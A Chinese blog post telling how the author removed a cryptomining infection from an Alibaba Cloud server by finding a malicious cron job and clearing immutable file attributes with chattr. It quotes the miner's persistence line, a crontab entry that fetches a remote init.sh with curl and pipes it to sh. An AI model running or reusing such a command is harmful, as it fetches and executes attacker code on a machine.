最新消息:

阿里云被挖矿怎么办?解决阿里云服务器提示有挖矿程序

服务器租用 晓宇 浏览 评论

阿里云被挖矿怎么办?最近自己买了一台阿里云的Ecs学生机用来玩玩,已经好久没有管了,最近每天凌成三点阿里云发短信提示出现紧急安全事件:挖矿程序,建议紧急处理。实在受不了了,登录阿里云查看了一下监控,所有指标正常,网上所说的肉机特征完全没有出现,但是短信天天提醒,MD只能继续处理一下。下面,看一下我是怎么处理阿里云服务器提示有挖矿程序这样的问题的!

症状:

先top free df看一下,老铁没毛病啊,然后还是发现了一些异常文件,当时没有截图,导致大家看不了,于是赶紧一顿rm * -rf

哈哈,没有了,开心一下。。。。。。。第二天短信依然而来,细心的我发现了有个定时任务(crontab -l查看)有条语句:

*/6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1

解决:

找到问题赶紧解决,删除定时任务文件,执行 crontab -e 命令,提示如下错误

crontab: installing new crontab
/var/spool/cron/tmp.XXXX6bK9dR: Permission denied
crontab: edits left in /tmp/crontab.ssXqpW

通过报错信息发现是 /var/spool/cron/目录无法写入。 目录被设置为不能被删除、改名、设定链接关系,同时不能写入或新增内容。

解决方案:

执行如下命令,进入 /var/spool/cron/目录。
cd /var/spool/cron/

执行如下命令,进行写入测试。
touch abc

系统显示类似如下,无法写入。

touch: cannot touch `abc’: Permission denied

此时想到,目录可能有什么特殊的地方,root用户也被约束了。

切换到上级目录,执行如下命令。
lsattr cron/

系统显示类似如下,发现文件有“ai”属性。

—-ai——–e- cron/root

查找资料“i”属性设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容;a是访问具有属性集的文件时,不会修改其atime记录,这可以避免一定量的磁盘I / O操作

4. 执行如下命令,删除“ia”属性。

chattr -ai cron/

5.再次执行 crontab -e 命令,系统显示类似如下

crontab: installing new crontab
crontab: error renaming /var/spool/cron/tmp.XXXXwhWDUP to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.5f279w

6.执行如下命令,修改/var/spool/cron/root权限

chattr -ai cron/root

7.执行 crontab -e 命令,系统显示类似如下,表示恢复正常。

crontab: installing new crontab

8.解决问题删除害虫文件

crontab -r

问题解决:

开心啊,从自通过处理以后,就再也没有收到报警短信了,o(∩_∩)o 哈哈

推荐阅读:
    云服务器被挖矿木马入侵怎么办?腾讯云安全解决方案与安全防护建议 云服务器被挖矿木马入侵怎么办?“挖矿木马”开始大规模流行于2017年初,黑客通过网络入侵控制大量计算机并植入矿…... 阿里云突发性能实例t5与通用型g5区别及选择【参考资料】 阿里云突发性能t5实例与通用型g5实例哪个好?阿里云突发性能t5实例是入门级服务器中的典型代表机型,阿里云通用…... 什么是网站备案?网站不备案有什么后果和弊端? 什么是网站备案?许多准备买云服务器的客户,准备做个人网站或企业官网,一般可能会来咨询网站备案的相关问题。比如:…... 常见的云服务器漏洞有哪些?我们应该怎么样处理? 常见的云服务器漏洞有哪些?如今越来越多的企业将业务部署在云服务器上,所以也越来越重视云服务器安全防护。安全问题…... 你的云服务器安全吗?如何用命令操作云服务器? 你的云服务器安全吗?阿里云,腾讯云,美团云,华为云,各云服务器平台都适用。如何购买云服务器,阿里云,腾讯云,美…...

    发表我的评论
    取消评论

    表情

    您的回复是我们的动力!

    • 昵称 (必填)
    • 验证码 点击我更换图片

    网友最新评论